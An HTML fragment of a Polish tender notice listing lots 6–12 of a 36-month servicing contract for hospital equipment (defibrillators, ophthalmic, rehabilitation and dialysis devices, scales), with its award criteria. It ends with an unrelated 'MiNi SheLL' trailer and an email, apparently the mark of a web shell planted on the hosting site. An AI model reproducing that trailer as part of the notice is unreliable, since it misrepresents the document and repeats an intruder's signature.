<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Defibrylator	LIFEPACK 12
2.	Defibrylator	LIFEPACK 12
3.	Defibrylator	LIFEPACK 12
4.	Defibrylator	LIFEPACK 12
5.	Defibrylator	LIFEPACK 12
6.	Defibrylator	LIFEPACK 12
7.	Defibrylator	LIFEPACK 20
8.	Defibrylator	LIFEPACK 20
9.	Defibrylator	LIFEPACK CR Plus.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sprzęt medyczny -  okulistyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Funduskamera cyfrowa (Retinofot)	TRC-NW8F
2.	Mikroskop operacyjny	OMS-600
3.	Mikroskop operacyjny	OMS-710
4.	Spektralny tomograf oka	TOPCON 3D OCT-1000 MarkII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sprzęt medyczny -  okulistyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Aparat do fakoemulsyfikacji oraz do witrektomii przedniej i tylnej	ASSOCIATE 6700-C
2.	Aparat do komputerowego badania pola widzenia	OCTOPUS 301/311
3.	Aparat do terapii laserowej retinopatii u wczesniaków	IQ 810
4.	Autorefraktometr	8001
5.	Autorefraktometr	GR 2100
6.	Lampa szczelinowa	SL 115 CLASSIC
7.	Lampa szczelinowa	SL 115 CLASSIC
8.	Lampa szczelinowa	YZ5S
9.	Laser okulistyczny	LP4532 SOLITAIRE
10.	Oftalmoskop	OMEGA 180
11.	Oftalmoskop	OMEGA 500
12.	Tonometr	AT 030 aplanyjny
13.	Tonometr	FT-1000
14.	Tonometr	HNT-7000
15.	Unit okulistyczny	ECO.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sprzęt medyczny  -  rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1	Aparat do elektrostymulacji	ENDOMET-982
2	Aparat do elektroterapii.	DUOTER L+
3	Aparat do jonofrezy	SONOTER PLUS
4	Aparat do magnetoterapii.	MAGNER PLUS
5	Aparat do magnetoterapii.	MAGNETRON GMT-AC
6	Aparat do masażu uciskowego sekwencyjnego	Lymphatron DL1200
7	Aparat do terapii	MASTER PLUS EXSTR
8	Aparat do terapii podciśnieniowej	VACATRON-560
9	Bieżnia wysiłkowa	MARATHON HS
10	Diatermia KF	CURAPULS 419
11	Diatronic	DT-7B
12	Dynatron	1438.901
13	Erbogalvan	COMFORT
14	Ergometr 	MON 818
15	Ergometr 	POLO S
16	Ergometr 	POLO S
17	Ergometr 	POLO S
18	Ergometr 	RE 7
19	Ergometr 	RX 7
20	Ergometr 	RX 7
21	Fotel do ćwiczeń	-Brak-
22	Interdynamic	ID 4C
23	Lampa statywowa	SOLLUX
24	Lampa terapeutyczna	Lumina
25	Laser  terapeutyczny	LT-1000
26	Laser  terapeutyczny	POLARIS 2  PM 
27	Laser + skaner	CTL-1202
28	Łóżko rehabilitacyjne	NOVERA 3A
29	Łóżko rehabilitacyjne	NOVERA 3A
30	Magnetronic	MF-10
31	Magnetronic	MF-10
32	Pionizator statyczny (Parapodium elektryczne)	STADY ELEKTRO WING
33	Pionizator statyczny (Parapodium elektryczne)	STADY ELEKTRO WING
34	Platforma stabilometryczna do ćwiczeń równowagi	PK 200
35	Platforma stabilometryczna do ćwiczeń równowagi STABILITY-ST 310
36	Pulsotronic	St-4M
37	Pulsotronic	St-5ED
38	Rotor KKG i KKD do ćwiczeń czynnych i biernych	MOTOmed VIVA2
39	Rotor KKG i KKD do ćwiczeń czynnych i biernych	MOTOmed VIVA2
40	Sonomatic  przenośny	SX-3A
41	Sonopuls	992
42	Stół do pionizacji	AZURYT-I
43	Stół do pionizacji	AZURYT-I
44	Stół rehabilitacyjny	KL-88
45	Stół rehabilitacyjny	KORUND-E - BOBATH
46	Stół rehabilitacyjny	OPAL
47	Stół rehabilitacyjny	OPAL
48	Stół rehabilitacyjny	REHA STANDART
49	Stół terapeutyczny	SCB-1
50	Stół terapeutyczny	SCB-1
51	Stymulator	GALAUS 5
52	System dynamicznego odciążenia	BIODEX Urządzenie do nauki chodu
53	Szyna ortopedyczna	ARTROMOT K-1
54	Szyna ortopedyczna	ARTROMOT K-2
55	Szyna ortopedyczna	ARTROMOT K-2
56	Szyna ortopedyczna	ARTROMOT K-2
57	Szyna ortopedyczna	ARTROMOT-K1CC
58	Szyna ortopedyczna	FISIOTEK 2000E
59	Szyna ortopedyczna	FISIOTEK 3000N
60	Szyna ortopedyczna	FISIOTEK 3000N
61	Terapuls	Curapuls 419
62	Urządzenie do krioterapii	KRIOPOL R-26 wer.1
63	Urządzenie do masażu wirowego kończyn dolnych	WKD
64	Urządzenie do masażu wirowego kończyn górnych	WKG
65	Urządzenie do terapii ruchowej	MOTOmed LETTO2
66	Urządzenie do terapii ruchowej	MOTOmed VIVA2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.21.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Sprzęt medyczny -  dializacyjny i pomocniczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Aparat do automatycznej dializy otrzewnowej	HOME-HOICE
2.	Aparat do automatycznej dializy otrzewnowej	HOME-HOICE
3.	Aparat do automatycznej dializy otrzewnowej	HOME-HOICE
4.	Aparat do hemodializy-sztuczna nerka	DIALOG
5.	Aparat do hemodializy-sztuczna nerka	DIALOG +
6.	Aparat do hemodializy-sztuczna nerka	DIALOG +
7.	Aparat do hemodializy-sztuczna nerka	DIALOG +
8.	Aparat do hemodializy-sztuczna nerka	DIALOG +
9.	Aparat do hemodializy-sztuczna nerka	DIALOG +
10.	Aparat do hemodializy-sztuczna nerka	DIALOG +
11.	Aparat do hemodializy-sztuczna nerka	DIALOG +
12.	Aparat do hemodializy-sztuczna nerka	DIALOG +
13.	Aparat do hemodializy-sztuczna nerka	DIALOG + HDF-ONLINE:   7102072
14.	Aparat do hemodializy-sztuczna nerka	DIALOG + HDF-ONLINE:   7102072
15.	Aparat do hemodializy-sztuczna nerka	DIALOG A+
16.	Aparat do hemodializy-sztuczna nerka	DIALOG A+
17.	Aparat do hemodializy-sztuczna nerka	DIALOG A+
18.	Aparat do hemodializy-sztuczna nerka	DIALOG A+
19.	Aparat do hemodializy-sztuczna nerka	DIALOG B+
20.	Aparat do hemodializy-sztuczna nerka	DIALOG B+
21.	Aparat do hemodializy-sztuczna nerka	DIALOG B+
22.	Aparat do hemodializy-sztuczna nerka	DIALOG+ 710500C
23.	Aparat do hemodializy-sztuczna nerka	DIALOG+ 710500C
24.	Aparat do hemodializy-sztuczna nerka	DIALOG+ 710500C
25.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
26.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
27.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
28.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
29.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
30.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
31.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
32.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
33.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
34.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
35.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
36.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
37.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
38.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
39.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
40.	Aparat do hemodializy-sztuczna nerka	HD-DIALOG B+  710201C
41.	Aparat do hemodializy-sztuczna nerka	HDF ONLINE
42.	Aparat do hemodializy-sztuczna nerka	HDF ONLINE
43.	Aparat do hemodializy-sztuczna nerka	HDF ONLINE
44.	Fotel dializacyjny 	COMFORT 2F
45.	Fotel dializacyjny 	COMFORT 2F
46.	Fotel dializacyjny 	COMFORT 2F
47.	Fotel dializacyjny 	COMFORT 2F
48.	Fotel dializacyjny 	COMFORT 2F
49.	Fotel dializacyjny 	COMFORT 2F
50.	Fotel dializacyjny 	COMFORT 2F
51.	Fotel dializacyjny 	COMFORT 2F
52.	Fotel dializacyjny 	COMFORT 2F
53.	Fotel dializacyjny 	COMFORT 2F
54.	Fotel dializacyjny 	COMFORT 2F
55.	Fotel dializacyjny 	COMFORT 2F
56.	Fotel dializacyjny 	COMFORT 2F
57.	Fotel dializacyjny 	COMFORT 2F
58.	Fotel dializacyjny 	COMFORT 2F
59.	Fotel dializacyjny 	COMFORT 2F
60.	Fotel dializacyjny 	COMFORT-4  ECO
61.	Fotel dializacyjny 	COMFORT-4  ECO
62.	Fotel dializacyjny 	COMFORT-4  ECO
63.	Fotel dializacyjny 	COMFORT-4  ECO
64.	Fotel dializacyjny 	COMFORT-4  ECO
65.	Fotel dializacyjny 	COMFORT-4  ECO
66.	Fotel dializacyjny 	COMFORT-4  ECO
67.	Fotel dializacyjny 	COMFORT-4  ECO
68.	Fotel dializacyjny 	COMFORT-4  ECO
69.	Fotel dializacyjny 	COMFORT-4  ECO
70.	Fotel dializacyjny 	COMFORT-4  ECO
71.	Fotel dializacyjny 	COMFORT-4  ECO
72.	Fotel dializacyjny 	COMFORT-4  ECO
73.	Fotel dializacyjny 	COMFORT-4  ECO
74.	Fotel dializacyjny 	COMFORT-4  ECO
75.	Fotel dializacyjny 	COMFORT-4  ECO
76.	Fotel dializacyjny 	COMFORT-4  ECO
77.	Fotel dializacyjny 	COMFORT-4  ECO
78.	Fotel dializacyjny 	COMFORT-4  ECO
79.	Fotel dializacyjny 	COMFORT-4  ECO.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Sprzęt medyczny  - okulistyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Autokeratorefraktometr	GR 3100K
2.	Lampa szczelinowa	L-0187 INAMI
3.	Laser okulistyczny	LP4532 SOLITAIRE
4.	Oftalmoskop	11782-VSM
5.	Unit okulistyczny	DOUBLETTE FISO
6.	Wyswietlacz optotypów	CP-200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Sprzęt medyczny  - ratujący życie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L,p.	Nazwa urządzenia	Typ
1.	Defibrylator	I-PAD NF1200
2.	Defibrylator	I-PAD NF1200
3.	Defibrylator	I-PAD NF1200
4.	Defibrylator	I-PAD NF1200
5.	Defibrylator	I-PAD NF1200
6.	Defibrylator	I-PAD NF1200
7.	Defibrylator	I-PAD NF1200
8.	Defibrylator	I-PAD NF1200
9.	Defibrylator	I-PAD NF1200
10.	Defibrylator	I-PAD NF1200
11.	Defibrylator	I-PAD NF1200
12.	Defibrylator	I-PAD NF1200
13.	Defibrylator	I-PAD NF1200
14.	Defibrylator	I-PAD NF1200
15.	Defibrylator	I-PAD NF1200
16.	Defibrylator	I-PAD NF1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Sprzęt medyczny  - metrologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Waga	 B30
2.	Waga	0sobowa WPT 60/150 OW
3.	Waga	60/150 O
4.	Waga	APN-1A
5.	Waga	KATIA
6.	Waga	MC-250
7.	Waga	pacjenta-150kg
8.	Waga	SECA
9.	Waga	SECA 799
10.	Waga	SECA 834/835
11.	Waga	SECA 834/835
12.	Waga	SECA 834/835
13.	Waga	SECA-krzesełkowa
14.	Waga	SEKA 150
15.	Waga	SOEHNLE
16.	Waga	SOEHNLE
17.	Waga	TP15/1 Bobas
18.	Waga	WA-31
19.	Waga	WB 150
20.	Waga	WL 150
21.	Waga	WP 150
22.	Waga	WP/F3C
23.	Waga	WPE-60 elektroniczna
24.	Waga	WPL 150
25.	Waga	WPT 10/20D
26.	Waga	WPT 10/20D
27.	Waga	WPT 10/20D
28.	Waga	WPT 10/20D
29.	Waga	WPT 10/20D
30.	Waga	WPT 10/20D
31.	Waga	WPT 10/20D
32.	Waga	WPT 10/20D
33.	Waga	WPT 10/20D
34.	Waga	WPT 10/20D
35.	Waga	WPT 10/20D
36.	Waga	WPT 10/20D
37.	Waga	WPT 10/20D
38.	Waga	WPT 10/20D
39.	Waga	WPT 10/20D
40.	Waga	WPT 100/200 OW
41.	Waga	WPT 100/2000
42.	Waga	WPT 15 D
43.	Waga	WPT 15 D
44.	Waga	WPT 15 D
45.	Waga	WPT 15 D
46.	Waga	WPT 150
47.	Waga	WPT 150
48.	Waga	WPT 150.0
49.	Waga	WPT 20 D
50.	Waga	WPT 20 D
51.	Waga	WPT 20 D
52.	Waga	WPT 3/6 elektroniczna
53.	Waga	WPT 5C elektroniczna
54.	Waga	WPT 6/15 D
55.	Waga	WPT 6/15 D
56.	Waga	WPT 6/15 D
57.	Waga	WPT 6/15 D
58.	Waga	WPT 6/15 D
59.	Waga	WPT 6/15 D
60.	Waga	WPT 6/15D elektroniczna
61.	Waga	WPT 60/150 ON
62.	Waga	WPT 60/150 ON
63.	Waga	WPT 60/150 ON
64.	Waga	WPT 60/150 OW
65.	Waga	WPT 60/150 OW
66.	Waga	WPT 60/150 OW
67.	Waga	WPT 60/150 OW
68.	Waga	WPT 60/150 OW
69.	Waga	WPT 60/150 OW
70.	Waga	WPT 60/150 OW
71.	Waga	WPT 60/150 OW
72.	Waga	WPT 60/150 OW
73.	Waga	WPT 60/150 OW
74.	Waga	WPT 60/150 OW
75.	Waga	WPT 60/150 OW
76.	Waga	WPT 60/150 OW
77.	Waga	WPT 60/150 OW
78.	Waga	WPT 60/150.0
79.	Waga	WPT 60/150.0
80.	Waga	WPT 60/50
81.	Waga	WPT 8B/300C - najazdowa
82.	Waga	WPT 8B/300C - najazdowa
83.	Waga	WPT/4K
84.	Waga	WTL 150
85.	Waga	WTL 150
86.	Waga	X-112
87.	Waga	ZUK 50A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com